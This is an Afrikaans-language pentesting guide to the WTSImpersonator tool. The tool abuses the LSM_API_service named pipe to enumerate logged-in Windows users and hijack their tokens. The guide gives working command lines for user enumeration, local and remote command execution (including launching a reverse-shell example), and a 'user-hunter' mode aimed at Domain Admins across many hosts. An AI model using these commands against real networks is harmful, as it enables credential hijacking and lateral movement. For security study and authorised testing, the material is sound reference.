Die WTS Impersonator-werktuig maak gebruik van die "\pipe\LSM_API_service" RPC Genoemde pyp om stiekem ingeteken gebruikers te ontleed en hul tokens te kaap, deur tradisionele Token Impersonation-tegnieke te omseil. Hierdie benadering fasiliteer naatlose laterale bewegings binne netwerke. Die innovasie agter hierdie tegniek word toegeskryf aan Omri Baso, wie se werk toeganklik is op GitHub.

Kernfunksionaliteit

Die werktuig werk deur 'n reeks API-oproepe:

WTSEnumerateSessionsA → WTSQuerySessionInformationA → WTSQueryUserToken → CreateProcessAsUserW

Sleutelmodules en Gebruik

• Gebruikers Enumereren: Plaaslike en afgeleë gebruikersenumerasie is moontlik met die instrument, deur opdragte vir beide scenario's te gebruik:

• Plaaslik:

.\WTSImpersonator.exe -m enum

• Afgeleë, deur 'n IP-adres of gasheernaam te spesifiseer:

.\WTSImpersonator.exe -m enum -s 192.168.40.131

• Opdragte Uitvoer: Die exec en exec-remote modules vereis 'n Diens konteks om te funksioneer. Plaaslike uitvoering benodig eenvoudig die WTSImpersonator uitvoerbare lêer en 'n opdrag:

• Voorbeeld vir plaaslike opdraguitvoering:

.\WTSImpersonator.exe -m exec -s 3 -c C:\Windows\System32\cmd.exe

• PsExec64.exe kan gebruik word om 'n dienskonteks te verkry:

.\PsExec64.exe -accepteula -s cmd.exe

• Afgeleë Opdraguitvoering: Behels die skep en installeer van 'n diens afgeleë soortgelyk aan PsExec.exe, wat uitvoering met toepaslike regte moontlik maak.

• Voorbeeld van afgeleë uitvoering:

.\WTSImpersonator.exe -m exec-remote -s 192.168.40.129 -c .\SimpleReverseShellExample.exe -sp .\WTSService.exe -id 2

• Gebruikerjagmodule: Teiken spesifieke gebruikers oor verskeie masjiene, voer kode uit onder hul geloofsbriewe. Dit is veral nuttig om te mik vir Domein Admins met plaaslike administrateursregte op verskeie stelsels.

• Gebruik voorbeeld:

.\WTSImpersonator.exe -m user-hunter -uh DOMAIN/USER -ipl .\IPsList.txt -c .\ExeToExecute.exe -sp .\WTServiceBinary.exe